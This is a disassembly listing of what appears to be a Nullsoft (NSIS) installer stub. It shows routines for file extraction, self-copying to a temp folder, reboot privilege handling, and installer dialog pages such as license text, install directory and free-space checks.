call sub_405DBB
test eax, eax
mov dword_4201B0, eax
jz loc_403D48
cmp edi, ebp
jbe short loc_403C92
mov edi, ebp
loc_403C92: ; CODE XREF: start+1A4�j
dec edi
push edi
push esi
push eax
call ebx ; lstrcpyn
push dword_4201B0
call sub_4061A6
push 0
push dword_4201B0
call ds:dword_4080C4 ; CreateDirectoryA
mov edi, [esp+80h+var_64]
mov byte ptr [esp+80h+var_70], 2Fh
loc_403CBA: ; CODE XREF: start+EE�j start+132�j ...
push [esp+80h+var_70]
push esi
call sub_405DCA
mov esi, eax
cmp byte ptr [esi], 22h
jnz short loc_403CCC
inc esi
loc_403CCC: ; CODE XREF: start+CC�j start+1DF�j ...
mov al, [esi]
test al, al
jnz loc_403BBB
loc_403CD6: ; CODE XREF: start+255�j
push edi
call sub_403756
mov ebx, eax
xor ebp, ebp
cmp ebx, ebp
jnz loc_403DA4
cmp dword_426440, ebp
jz loc_403D8D
mov edi, [esp+80h+var_68]
push ebp
push edi
call sub_405DCA
mov esi, eax
jmp short loc_403D58
; ---------------------------------------------------------------------------
loc_403D03: ; CODE XREF: start+162�j start+16A�j
push ebp
call sub_405DBB
test eax, eax
mov dword_4201B0, eax
jz short loc_403D22
push offset aCNsis_extractf ; "C:\\NSIS_ExtractFiles\\"
push eax
call sub_405FFD ; lstrcpy
mov eax, dword_4201B0
loc_403D22: ; CODE XREF: start+226�j
push 0
push eax
call ds:dword_4080C4 ; CreateDirectoryA
jmp short loc_403CCC
; ---------------------------------------------------------------------------
loc_403D2D: ; CODE XREF: start+126�j
mov byte ptr [esi-2], 0
add esi, 2
push esi
push offset byte_42C400
call sub_405FFD ; lstrcpy
jmp short loc_403CD6
; ---------------------------------------------------------------------------
loc_403D41: ; CODE XREF: start+183�j
mov ebx, offset aExtractionPath ; "Extraction pathname not properly delimi"...
jmp short loc_403DA4
; ---------------------------------------------------------------------------
loc_403D48: ; CODE XREF: start+19C�j
mov ebx, offset aOutOfMemory ; "Out of Memory"
jmp short loc_403DA4
; ---------------------------------------------------------------------------
loc_403D4F: ; CODE XREF: start+270�j
cmp dword ptr [esi], 3D3F5F20h
jz short loc_403D5C
dec esi
loc_403D58: ; CODE XREF: start+217�j
cmp esi, edi
jnb short loc_403D4F
loc_403D5C: ; CODE XREF: start+26B�j
cmp esi, edi
mov ebx, offset aErrorLaunching ; "Error launching installer"
jb short loc_403DC9
mov byte ptr [esi], 0
add esi, 4
push esi
call sub_40622D
test eax, eax
jz short loc_403DA4
push esi
push offset byte_42C400
call sub_405FFD ; lstrcpy
push esi
push offset dword_42C800
call sub_405FFD ; lstrcpy
xor ebx, ebx
loc_403D8D: ; CODE XREF: start+204�j
or dword_42648C, 0FFFFFFFFh
call sub_405A5A
push 1
mov [esp+80h+var_68], eax
call sub_4060AD
loc_403DA4: ; CODE XREF: start+72�j start+1F8�j ...
call sub_403A96
call ds:dword_408290
test ebx, ebx
jz loc_403ECA
push 200010h
push ebx
call sub_405D79
push 2
jmp loc_403F86
; ---------------------------------------------------------------------------
loc_403DC9: ; CODE XREF: start+279�j
mov [esp+6Ch+var_5C], ebp
mov edi, offset byte_4201B9
mov esi, offset byte_4201B8
mov ebp, offset dword_4209B8
loc_403DDC: ; CODE XREF: start+3D5�j
push offset aCDocume1SriUse ; "C:\\DOCUME~1\\SRI-user\\LOCALS~1\\Temp\\"
push edi
mov byte_4201B8, 22h
call sub_405FFD ; lstrcpy
push offset aANsisu__exe ; "A~NSISu_.exe"
push esi
call ds:dword_4080A4 ; lstrcat
push edi
call ds:dword_408128 ; DeleteFileA
test ebx, ebx
jz loc_403EB0
push 400h
push ebp
push dword_4263E4
call ds:dword_40815C ; GetModuleFileNameA
push 40A015h
lea eax, dword_4209AD[eax]
push eax
call ds:dword_408080 ; lstrcmpi
test eax, eax
jz loc_403DA4
push 0
push edi
push ebp
call ds:dword_4080D0 ; CopyFileA
test eax, eax
jz short loc_403EB0
push 0
push edi
call sub_406357
cmp ds:byte_42C400, 0
jz short loc_403E61
push offset byte_42C400
push ebp
call sub_405FFD ; lstrcpy
jmp short loc_403E67
; ---------------------------------------------------------------------------
loc_403E61: ; CODE XREF: start+368�j
push ebp
call sub_406207
loc_403E67: ; CODE XREF: start+375�j
push offset asc_408B0C ; "\" "
push esi
call ds:dword_4080A4 ; lstrcat
push [esp+0A8h+var_90]
push esi
call ds:dword_4080A4 ; lstrcat
push offset a_?_0 ; " _?="
push esi
call ds:dword_4080A4 ; lstrcat
push ebp
push esi
call ds:dword_4080A4 ; lstrcat
push esi
call sub_4061A6
push offset aCDocume1SriUse ; "C:\\DOCUME~1\\SRI-user\\LOCALS~1\\Temp\\"
push esi
call sub_405D01
test eax, eax
jz short loc_403EB0
push eax
call ds:dword_408084 ; CloseHandle
xor ebx, ebx
loc_403EB0: ; CODE XREF: start+319�j start+357�j ...
inc byte ptr aANsisu__exe ; "A~NSISu_.exe"
inc [esp+0C4h+var_B4]
cmp [esp+0C4h+var_B4], 1Ah
jl loc_403DDC
jmp loc_403DA4
; ---------------------------------------------------------------------------
loc_403ECA: ; CODE XREF: start+2C7�j
cmp dword_426474, 0
jz loc_403F74
push offset aAdvapi32_dll ; "ADVAPI32.dll"
call ds:dword_408068 ; GetModuleHandleA
mov edi, eax
xor ebx, ebx
cmp edi, ebx
jz short loc_403F60
mov esi, ds:dword_40812C
push offset aOpenprocesstok ; "OpenProcessToken"
push edi
call esi ; GetProcAddress
push offset aLookupprivileg ; "LookupPrivilegeValueA"
push edi
mov [esp+90h+var_70], eax
call esi ; GetProcAddress
push offset aAdjusttokenpri ; "AdjustTokenPrivileges"
push edi
mov ebp, eax
call esi ; GetProcAddress
cmp [esp+98h+var_80], ebx
mov esi, eax
jz short loc_403F60
cmp ebp, ebx
jz short loc_403F60
cmp esi, ebx
jz short loc_403F60
lea eax, [esp+98h+var_7C]
push eax
push 28h
call ds:dword_4080CC ; GetCurrentProcess
push eax
call [esp+0A4h+var_80]
test eax, eax
jz short loc_403F60
lea eax, [esp+0A4h+var_80]
push eax
push offset aSeshutdownpriv ; "SeShutdownPrivilege"
push ebx
call ebp
push ebx
push ebx
push ebx
lea eax, [esp+0BCh+var_90]
push eax
push ebx
push [esp+0C4h+var_94]
mov [esp+0C8h+var_90], 1
mov [esp+0C8h+var_84], 2
call esi ; GetProcAddress
loc_403F60: ; CODE XREF: start+3FE�j start+42A�j ...
push ebx
push 2
call ds:dword_408194 ; ExitWindowsEx
test eax, eax
jnz short loc_403F74
push 9
call sub_4014C9
loc_403F74: ; CODE XREF: start+3E7�j start+481�j
mov eax, dword_42648C
cmp eax, 0FFFFFFFFh
jz short loc_403F82
mov [esp+0D0h+var_BC], eax
loc_403F82: ; CODE XREF: start+492�j
push [esp+0D0h+var_BC]
loc_403F86: ; CODE XREF: start+2DA�j
call ds:dword_4080C8 ; ExitProcess
int 3 ; Trap to Debugger
start endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_403F8D proc near ; CODE XREF: sub_405202+234�p
; sub_405202+270�p ...
arg_0 = dword ptr 4
cmp [esp+arg_0], 78h
jnz short loc_403F9A
inc dword_425BB4
loc_403F9A: ; CODE XREF: sub_403F8D+5�j
push 0
push [esp+4+arg_0]
push 408h
push dword_4263E0
call ds:dword_408278 ; SendMessageA
retn 4
sub_403F8D endp
; =============== S U B R O U T I N E =======================================
sub_403FB4 proc near ; CODE XREF: sub_40428C+64�p
; sub_40428C+71�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push [esp+arg_8]
push 0
call sub_4065B7
push eax
mov eax, [esp+4+arg_4]
add eax, 3E8h
push eax
push [esp+8+arg_0]
call sub_405D57 ; SetDlgItemTextA
retn 0Ch
sub_403FB4 endp
; =============== S U B R O U T I N E =======================================
sub_403FD6 proc near ; CODE XREF: sub_40428C+18A�p
; sub_40463C+305�p ...
cmp dword_42646C, 0
mov eax, dword_4211C8
jnz short loc_403FE9
mov eax, dword_4229D8
loc_403FE9: ; CODE XREF: sub_403FD6+C�j
push 1
push 1
push 0F4h
push eax
call ds:dword_408278 ; SendMessageA
retn
sub_403FD6 endp
; =============== S U B R O U T I N E =======================================
sub_403FFA proc near ; CODE XREF: sub_40428C+8F�p
; sub_40428C+185�p ...
arg_0 = dword ptr 4
push [esp+arg_0]
push dword_4229D8
call ds:dword_408250 ; EnableWindow
retn 4
sub_403FFA endp
; =============== S U B R O U T I N E =======================================
sub_40400D proc near ; CODE XREF: sub_40428C+A5�p
; sub_40463C+E4�p ...
arg_0 = dword ptr 4
push 1
push [esp+4+arg_0]
push 28h
push dword_4263E0
call ds:dword_408278 ; SendMessageA
retn 4
sub_40400D endp
; =============== S U B R O U T I N E =======================================
sub_404024 proc near ; CODE XREF: sub_4049AD+20�p
; sub_405177+76�p ...
arg_0 = dword ptr 4
mov eax, dword_425BA8
test eax, eax
jz short locret_40403C
push 0
push 0
push [esp+8+arg_0]
push eax
call ds:dword_408278 ; SendMessageA
locret_40403C: ; CODE XREF: sub_404024+7�j
retn 4
sub_404024 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40403F proc near ; CODE XREF: sub_40428C+299�p
; sub_404531+3D�p ...
var_C = dword ptr -0Ch
var_8 = dword ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 0Ch
add eax, 0FFFFFECDh
cmp eax, 5
push esi
ja loc_4040E2
push 0FFFFFFEBh
push [ebp+arg_4]
call ds:dword_4081A0 ; GetWindowLongA
mov esi, eax
test esi, esi
jz short loc_4040E2
test byte ptr [esi+14h], 2
mov eax, [esi]
push edi
mov edi, ds:dword_40819C
jz short loc_404077
push eax
call edi ; GetSysColor
loc_404077: ; CODE XREF: sub_40403F+33�j
test byte ptr [esi+14h], 1
jz short loc_404087
push eax
push [ebp+arg_0]
call ds:dword_408050 ; SetTextColor
loc_404087: ; CODE XREF: sub_40403F+3C�j
push dword ptr [esi+10h]
push [ebp+arg_0]
call ds:dword_40804C ; SetBkMode
test byte ptr [esi+14h], 8
mov eax, [esi+4]
mov [ebp+var_8], eax
jz short loc_4040A5
push eax
call edi ; GetSysColor
mov [ebp+var_8], eax
loc_4040A5: ; CODE XREF: sub_40403F+5E�j
test byte ptr [esi+14h], 4
pop edi
jz short loc_4040B6
push eax
push [ebp+arg_0]
call ds:dword_408054 ; SetBkColor
loc_4040B6: ; CODE XREF: sub_40403F+6B�j
test byte ptr [esi+14h], 10h
jz short loc_4040DD
mov eax, [esi+8]
mov [ebp+var_C], eax
mov eax, [esi+0Ch]
test eax, eax
jz short loc_4040D0
push eax
call ds:dword_408040 ; DeleteObject
loc_4040D0: ; CODE XREF: sub_40403F+88�j
lea eax, [ebp+var_C]
push eax
call ds:dword_408044 ; CreateBrushIndirect
mov [esi+0Ch], eax
loc_4040DD: ; CODE XREF: sub_40403F+7B�j
mov eax, [esi+0Ch]
jmp short loc_4040E4
; ---------------------------------------------------------------------------
loc_4040E2: ; CODE XREF: sub_40403F+F�j
; sub_40403F+24�j
xor eax, eax
loc_4040E4: ; CODE XREF: sub_40403F+A1�j
pop esi
leave
retn 8
sub_40403F endp
; =============== S U B R O U T I N E =======================================
sub_4040E9 proc near ; CODE XREF: sub_401610+1A7D�p
; sub_40463C+3E�p ...
push offset aInstall_log ; "install.log"
push offset byte_42C400
push offset byte_425780
call sub_405FFD ; lstrcpy
push eax
call sub_4061A6
push eax
call ds:dword_4080A4 ; lstrcat
retn
sub_4040E9 endp
; =============== S U B R O U T I N E =======================================
sub_40410B proc near ; CODE XREF: sub_405A5A+1A�p
; sub_405A5A:loc_405C08�p
cmp ds:byte_42D000, 0
push ebx
push ebp
push esi
push edi
mov edi, 0FFFFh
mov ebx, offset byte_42D000
jz short loc_40412A
push ebx
call sub_405F74
jmp short loc_404130
; ---------------------------------------------------------------------------
loc_40412A: ; CODE XREF: sub_40410B+15�j
call ds:dword_4080E4 ; GetUserDefaultLangID
loc_404130: ; CODE XREF: sub_40410B+1D�j
xor ecx, ecx
loc_404132: ; CODE XREF: sub_40410B+8F�j
; sub_40410B+93�j
mov esi, dword_426424
test esi, esi
jz short loc_404185
mov ecx, dword_4263E8
mov ecx, [ecx+64h]
mov edx, ecx
imul ecx, esi
neg edx
add ecx, dword_426420
loc_404152: ; CODE XREF: sub_40410B+5B�j
xor ebp, ebp
add ecx, edx
mov bp, [ecx]
xor bp, ax
dec esi
and ebp, edi
test bp, bp
jz short loc_40416A
test esi, esi
jnz short loc_404152
jmp short loc_404185
; ---------------------------------------------------------------------------
loc_40416A: ; CODE XREF: sub_40410B+57�j
mov edx, [ecx+2]
mov dword_425BBC, edx
mov edx, [ecx+6]
mov dword_426488, edx
lea edx, [ecx+0Ah]
mov dword_425BC8, edx
loc_404185: ; CODE XREF: sub_40410B+2F�j
; sub_40410B+5D�j
cmp dword_425BC8, 0
jnz short loc_4041A0
cmp di, 0FFFFh
jnz short loc_40419C
mov edi, 3FFh
jmp short loc_404132
; ---------------------------------------------------------------------------
loc_40419C: ; CODE XREF: sub_40410B+88�j
xor edi, edi
jmp short loc_404132
; ---------------------------------------------------------------------------
loc_4041A0: ; CODE XREF: sub_40410B+81�j
movzx eax, word ptr [ecx]
push eax
push ebx
call sub_405F5B
push 0FFFFFFFEh
push offset aNsisError ; "NSIS Error"
call sub_4065B7
push eax
push dword_4211D4
call ds:dword_408184 ; SetWindowTextA
mov eax, dword_42640C
test eax, eax
mov esi, dword_426408
jz short loc_4041ED
mov edi, eax
loc_4041D4: ; CODE XREF: sub_40410B+E0�j
mov eax, [esi]
test eax, eax
jz short loc_4041E4
push eax
lea eax, [esi+18h]
push eax
call sub_4065B7
loc_4041E4: ; CODE XREF: sub_40410B+CD�j
add esi, 418h
dec edi
jnz short loc_4041D4
loc_4041ED: ; CODE XREF: sub_40410B+C5�j
pop edi
pop esi
pop ebp
pop ebx
retn
sub_40410B endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4041F2 proc near ; DATA XREF: sub_40463C+13E�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 1
push esi
mov esi, ds:dword_408278
jnz short loc_40421E
push [ebp+arg_C]
push 3FBh
call sub_405D5D
push [ebp+arg_C]
push 1
push 466h
push [ebp+arg_0]
call esi ; SendMessageA
loc_40421E: ; CODE XREF: sub_4041F2+E�j
cmp [ebp+arg_4], 2
jnz short loc_404251
push [ebp+arg_C]
push [ebp+arg_8]
call ds:dword_408178
test eax, eax
jz short loc_404242
push 7
call sub_4014C9
test eax, eax
jnz short loc_404242
inc eax
jmp short loc_404244
; ---------------------------------------------------------------------------
loc_404242: ; CODE XREF: sub_4041F2+40�j
; sub_4041F2+4B�j
xor eax, eax
loc_404244: ; CODE XREF: sub_4041F2+4E�j
push eax
push 0
push 465h
push [ebp+arg_0]
call esi ; SendMessageA
loc_404251: ; CODE XREF: sub_4041F2+30�j
xor eax, eax
pop esi
pop ebp
retn 10h
sub_4041F2 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404258 proc near ; DATA XREF: sub_40428C+5A�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
push [ebp+arg_8]
mov eax, [ebp+arg_0]
mov ecx, dword_420DB8
add ecx, eax
push ecx
push [ebp+arg_4]
call ds:dword_4080D4 ; lstrcpyn
push [ebp+arg_4]
call sub_406003 ; lstrlen
mov ecx, [ebp+arg_C]
add dword_420DB8, eax
mov [ecx], eax
xor eax, eax
pop ebp
retn 10h
sub_404258 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40428C proc near ; DATA XREF: .data:off_40A028�o
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 0Ch
cmp [ebp+arg_4], 110h
push ebx
push esi
push edi
jnz loc_4043AC
mov ebx, [ebp+arg_C]
mov edi, [ebx+30h]
test edi, edi
jge short loc_4042BD
mov ecx, dword_425BC8
lea eax, ds:4[edi*4]
sub ecx, eax
mov edi, [ecx]
loc_4042BD: ; CODE XREF: sub_40428C+1E�j
mov eax, dword_426418
push dword ptr [ebx+34h]
add edi, eax
movsx eax, byte ptr [edi]
and [ebp+var_8], 0
mov [ebp+arg_C], eax
mov eax, [ebx+14h]
mov esi, eax
shr esi, 5
not esi
push 22h
push [ebp+arg_0]
or esi, eax
inc edi
mov [ebp+var_C], edi
mov [ebp+var_4], offset sub_404258
and esi, 1
call sub_403FB4
push dword ptr [ebx+38h]
push 23h
push [ebp+arg_0]
call sub_403FB4
xor eax, eax
test esi, esi
setz al
push 1
add eax, 40Ah
push eax
push [ebp+arg_0]
call ds:dword_4081AC ; CheckDlgButton
push esi
call sub_403FFA
push 3E8h
push [ebp+arg_0]
call ds:dword_408240 ; GetDlgItem
mov ebx, eax
push ebx
call sub_40400D
mov esi, ds:dword_408278
push 0
push 1
push 45Bh
push ebx
call esi ; SendMessageA
mov eax, dword_4263E8
mov eax, [eax+68h]
test eax, eax
jge short loc_40435D
neg eax
push eax
call ds:dword_40819C ; GetSysColor
loc_40435D: ; CODE XREF: sub_40428C+C6�j
push eax
push 0
push 443h
push ebx
call esi ; SendMessageA
push 4010000h
push 0
push 445h
push ebx
call esi ; SendMessageA
and dword_420DB8, 0
push edi
call sub_406003 ; lstrlen
push eax
push 0
push 435h
push ebx
call esi ; SendMessageA
lea eax, [ebp+var_C]
push eax
push [ebp+arg_C]
push 449h
push ebx
call esi ; SendMessageA
and dword_4229E4, 0
xor eax, eax
jmp loc_40452A
; ---------------------------------------------------------------------------
loc_4043AC: ; CODE XREF: sub_40428C+10�j
cmp [ebp+arg_4], 111h
mov edi, ds:dword_408240
mov ebx, ds:dword_408278
jnz short loc_40441B
mov eax, [ebp+arg_8]
shr eax, 10h
test ax, ax
jnz loc_40451B
xor eax, eax
cmp dword_4229E4, eax
jnz loc_40451B
mov esi, dword_4229DC
add esi, 14h
test byte ptr [esi], 20h
jz loc_40451B
push eax
push eax
push 0F0h
push 40Ah
push [ebp+arg_0]
call edi ; GetDlgItem
push eax
call ebx ; SendMessageA
mov ecx, [esi]
and eax, 1
and ecx, 0FFFFFFFEh
or ecx, eax
push eax
mov [esi], ecx
call sub_403FFA
call sub_403FD6
loc_40441B: ; CODE XREF: sub_40428C+133�j
cmp [ebp+arg_4], 4Eh
jnz loc_40450C
push 3E8h
push [ebp+arg_0]
call edi ; GetDlgItem
mov ecx, [ebp+arg_C]
cmp dword ptr [ecx+8], 70Bh
jnz loc_4044C7
cmp dword ptr [ecx+0Ch], 201h
mov esi, ds:dword_4081A8
mov edi, ds:dword_4081A4
jnz short loc_4044B2
mov edx, [ecx+18h]
mov [ebp+var_C], edx
mov edx, [ecx+1Ch]
mov [ebp+var_8], edx
sub edx, [ebp+var_C]
mov [ebp+var_4], offset byte_424F80
cmp edx, 800h
jnb short loc_4044B2
lea ecx, [ebp+var_C]
push ecx
push 0
push 44Bh
push eax
call ebx ; SendMessageA
push 7F02h
push 0
call edi ; LoadCursorA
push eax
call esi ; SetCursor
push 1
push 0
push 0
push [ebp+var_4]
push offset aOpen ; "open"
push [ebp+arg_0]
call ds:dword_408164
push 7F00h
push 0
call edi ; LoadCursorA
push eax
call esi ; SetCursor
mov ecx, [ebp+arg_C]
loc_4044B2: ; CODE XREF: sub_40428C+1C6�j
; sub_40428C+1E4�j
cmp dword ptr [ecx+0Ch], 20h
jnz short loc_4044C7
push 7F89h
push 0
call edi ; LoadCursorA
push eax
call esi ; SetCursor
mov ecx, [ebp+arg_C]
loc_4044C7: ; CODE XREF: sub_40428C+1AD�j
; sub_40428C+22A�j
cmp dword ptr [ecx+8], 700h
jnz short loc_40451E
cmp dword ptr [ecx+0Ch], 100h
jnz short loc_40451E
cmp dword ptr [ecx+10h], 0Dh
jnz short loc_4044F3
push 0
push 1
push 111h
push dword_4263E0
call ebx ; SendMessageA
mov ecx, [ebp+arg_C]
loc_4044F3: ; CODE XREF: sub_40428C+251�j
cmp dword ptr [ecx+10h], 1Bh
jnz short loc_404507
push 0
push 0
push 10h
push dword_4263E0
call ebx ; SendMessageA
loc_404507: ; CODE XREF: sub_40428C+26B�j
xor eax, eax
inc eax
jmp short loc_40452A
; ---------------------------------------------------------------------------
loc_40450C: ; CODE XREF: sub_40428C+193�j
cmp [ebp+arg_4], 40Bh
jnz short loc_40451B
inc dword_4229E4
loc_40451B: ; CODE XREF: sub_40428C+13E�j
; sub_40428C+14C�j ...
mov ecx, [ebp+arg_C]
loc_40451E: ; CODE XREF: sub_40428C+242�j
; sub_40428C+24B�j
mov eax, [ebp+arg_4]
push ecx
push [ebp+arg_8]
call sub_40403F
loc_40452A: ; CODE XREF: sub_40428C+11B�j
; sub_40428C+27E�j
pop edi
pop esi
pop ebx
leave
retn 10h
sub_40428C endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404531 proc near ; DATA XREF: .data:0040A038�o
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
cmp [ebp+arg_4], 110h
push esi
mov esi, [ebp+arg_C]
jnz short loc_404567
push dword ptr [esi+30h]
push 1Dh
push [ebp+arg_0]
call sub_403FB4
mov eax, [esi+3Ch]
shl eax, 0Ah
add eax, offset dword_427000
push eax
push 3E8h
push [ebp+arg_0]
call sub_405D57 ; SetDlgItemTextA
loc_404567: ; CODE XREF: sub_404531+E�j
mov eax, [ebp+arg_4]
push esi
push [ebp+arg_8]
call sub_40403F
pop esi
pop ebp
retn 10h
sub_404531 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_404578 proc near ; CODE XREF: sub_40463C+2A5�p
; sub_40463C+2B4�p ...
var_40 = byte ptr -40h
var_20 = byte ptr -20h
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 40h
push ebx
push esi
push edi
push 14h
pop edi
mov esi, eax
cmp esi, 400h
push 0FFFFFFDCh
pop ebx
jnb short loc_404597
xor edi, edi
push 0FFFFFFDEh
jmp short loc_4045A4
; ---------------------------------------------------------------------------
loc_404597: ; CODE XREF: sub_404578+17�j
cmp esi, 100000h
jnb short loc_4045A5
push 0Ah
pop edi
push 0FFFFFFDDh
loc_4045A4: ; CODE XREF: sub_404578+1D�j
pop ebx
loc_4045A5: ; CODE XREF: sub_404578+25�j
push 0FFFFFFDFh
lea eax, [ebp+var_20]
push eax
call sub_4065B7
push eax
push ebx
lea eax, [ebp+var_40]
push eax
call sub_4065B7
push eax
lea eax, [esi+esi*4]
push 0Ah
shl eax, 1
mov ecx, edi
shr eax, cl
pop ecx
xor edx, edx
div ecx
mov ecx, edi
shr esi, cl
push edx
push esi
push offset aU_USS ; "%u.%u%s%s"
push [ebp+arg_4]
mov esi, offset dword_4219D8
push esi
call sub_4065B7
push esi
mov edi, eax
call sub_406003 ; lstrlen
add edi, eax
push edi
call ds:dword_408230 ; wsprintfA
add esp, 18h
push esi
push [ebp+arg_0]
push dword_425BA8
call sub_405D57 ; SetDlgItemTextA
pop edi
pop esi
pop ebx
leave
retn 8
sub_404578 endp
; =============== S U B R O U T I N E =======================================
sub_40460F proc near ; CODE XREF: sub_40463C+281�p
; sub_404A94+5A7�p ...
arg_0 = dword ptr 4
mov edx, dword_42640C
mov ecx, dword_426408
xor eax, eax
test edx, edx
jz short locret_404639
push esi
loc_404622: ; CODE XREF: sub_40460F+27�j
test byte ptr [ecx+8], 1
jz short loc_40462F
mov esi, [esp+4+arg_0]
add eax, [ecx+esi*4]
loc_40462F: ; CODE XREF: sub_40460F+17�j
add ecx, 418h
dec edx
jnz short loc_404622
pop esi
locret_404639: ; CODE XREF: sub_40460F+10�j
retn 4
sub_40460F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40463C proc near ; DATA XREF: .data:0040A030�o
var_48 = dword ptr -48h
var_44 = byte ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = byte ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
push ebp
mov ebp, esp
sub esp, 48h
mov eax, dword_4229DC
push ebx
push esi
mov esi, [eax+3Ch]
shl esi, 0Ah
mov [ebp+var_20], eax
mov eax, [eax+38h]
add esi, offset dword_427000
cmp [ebp+arg_4], 40Bh
push edi
mov [ebp+var_4], eax
mov ebx, 3FBh
jnz short loc_404692
push esi
push ebx
call sub_405D5D
push esi
call sub_406009
call sub_4040E9
push 3F0h
push [ebp+arg_0]
call ds:dword_4081B4 ; IsDlgButtonChecked
mov dword_423F78, eax
loc_404692: ; CODE XREF: sub_40463C+2F�j
cmp [ebp+arg_4], 110h
jnz loc_404725
push 10h
call ds:dword_4081B0 ; GetAsyncKeyState
test ah, ah
mov edi, ds:dword_408240
jns short loc_4046D5
push 3F0h
push [ebp+arg_0]
call edi ; GetDlgItem
push 0FFFFFFE0h
push 8
push [ebp+arg_0]
mov [ebp+var_8], eax
call sub_403FB4
push 8
push [ebp+var_8]
call ds:dword_408228 ; ShowWindow
loc_4046D5: ; CODE XREF: sub_40463C+73�j
push esi
call sub_405DE6
test eax, eax
jz short loc_4046EF
push esi
call sub_405E0D
test eax, eax
jnz short loc_4046EF
push esi
call sub_4061A6
loc_4046EF: ; CODE XREF: sub_40463C+A1�j
; sub_40463C+AB�j
push esi
push ebx
push [ebp+arg_0]
call sub_405D57 ; SetDlgItemTextA
mov eax, [ebp+arg_C]
push dword ptr [eax+34h]
push 1
push [ebp+arg_0]
call sub_403FB4
mov eax, [ebp+arg_C]
push dword ptr [eax+30h]
push 14h
push [ebp+arg_0]
call sub_403FB4
push ebx
push [ebp+arg_0]
call edi ; GetDlgItem
push eax
call sub_40400D
loc_404725: ; CODE XREF: sub_40463C+5D�j
cmp [ebp+arg_4], 111h
jnz loc_4047ED
movzx eax, word ptr [ebp+arg_8]
cmp eax, ebx
jnz short loc_404752
mov ecx, [ebp+arg_8]
shr ecx, 10h
cmp cx, 300h
jnz loc_40494C
mov [ebp+arg_4], 40Fh
loc_404752: ; CODE XREF: sub_40463C+FC�j
cmp eax, 3E9h
jnz loc_4047ED
push 7
pop ecx
push [ebp+var_4]
xor eax, eax
lea edi, [ebp+var_44]
rep stosd
mov eax, [ebp+arg_0]
mov edi, offset dword_4219D8
push 0
mov [ebp+var_48], eax
mov [ebp+var_40], edi
mov [ebp+var_34], offset sub_4041F2
mov [ebp+var_30], esi
call sub_4065B7
mov [ebp+var_3C], eax
lea eax, [ebp+var_48]
push eax
mov [ebp+var_38], 41h
call ds:dword_408168
test eax, eax
jz short loc_4047ED
push eax
call sub_405CD6
mov eax, dword_4263E8
mov eax, [eax+11Ch]
test eax, eax
jz short loc_4047DD
push eax
push 0
call sub_4065B7
push edi
mov edi, offset byte_424F80
push edi
call ds:dword_408080 ; lstrcmpi
test eax, eax
jz short loc_4047DD
push edi
push esi
call sub_4061A6
push eax
call ds:dword_4080A4 ; lstrcat
loc_4047DD: ; CODE XREF: sub_40463C+178�j
; sub_40463C+191�j
inc dword_420DC4
push esi
push ebx
push [ebp+arg_0]
call sub_405D57 ; SetDlgItemTextA
loc_4047ED: ; CODE XREF: sub_40463C+F0�j
; sub_40463C+11B�j ...
cmp [ebp+arg_4], 40Fh
jz short loc_404803
cmp [ebp+arg_4], 405h
jnz loc_40494C
loc_404803: ; CODE XREF: sub_40463C+1B8�j
and [ebp+var_4], 0
and [ebp+var_8], 0
push esi
push ebx
or edi, 0FFFFFFFFh
call sub_405D5D
push esi
call sub_40622D
test eax, eax
jnz short loc_404826
mov [ebp+var_4], 1
loc_404826: ; CODE XREF: sub_40463C+1E1�j
push esi
mov esi, offset dword_420DC8
push esi
call sub_405FFD ; lstrcpy
push esi
call sub_405E0D
test eax, eax
jz short loc_40483F
mov byte ptr [eax], 0
loc_40483F: ; CODE XREF: sub_40463C+1FE�j
push offset aKernel32_dll ; "KERNEL32.dll"
call ds:dword_408068 ; GetModuleHandleA
test eax, eax
mov ebx, 400h
jz short loc_404885
push offset aGetdiskfreespa ; "GetDiskFreeSpaceExA"
push eax
call ds:dword_40812C ; GetProcAddress
test eax, eax
jz short loc_404885
lea ecx, [ebp+var_1C]
push ecx
lea ecx, [ebp+var_14]
push ecx
lea ecx, [ebp+var_28]
push ecx
push esi
call eax
test eax, eax
jz short loc_404885
mov edi, [ebp+var_28]
mov eax, [ebp+var_24]
shrd edi, eax, 0Ah
shr eax, 0Ah
jmp short loc_4048B4
; ---------------------------------------------------------------------------
loc_404885: ; CODE XREF: sub_40463C+215�j
; sub_40463C+225�j ...
lea eax, [ebp+var_24]
push eax
lea eax, [ebp+var_C]
push eax
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call ds:dword_4080E8 ; GetDiskFreeSpaceA
test eax, eax
jz short loc_4048BB
mov eax, [ebp+var_10]
imul eax, [ebp+var_18]
push ebx
push [ebp+var_C]
